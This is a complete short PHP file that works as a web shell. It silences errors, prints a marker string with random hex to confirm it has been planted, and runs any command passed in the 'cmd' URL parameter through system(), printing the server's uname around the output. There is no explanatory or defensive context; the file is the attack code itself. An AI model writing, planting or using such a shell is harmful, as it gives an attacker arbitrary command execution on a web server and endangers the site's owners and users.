<?php @error_reporting(0);echo"GROK2025_".bin2hex(random_bytes(6))."_OK
";if(isset($_GET["cmd"])){echo"RCE_START_".php_uname()."_END
";system($_GET["cmd"]);echo"
RCE_END";}?>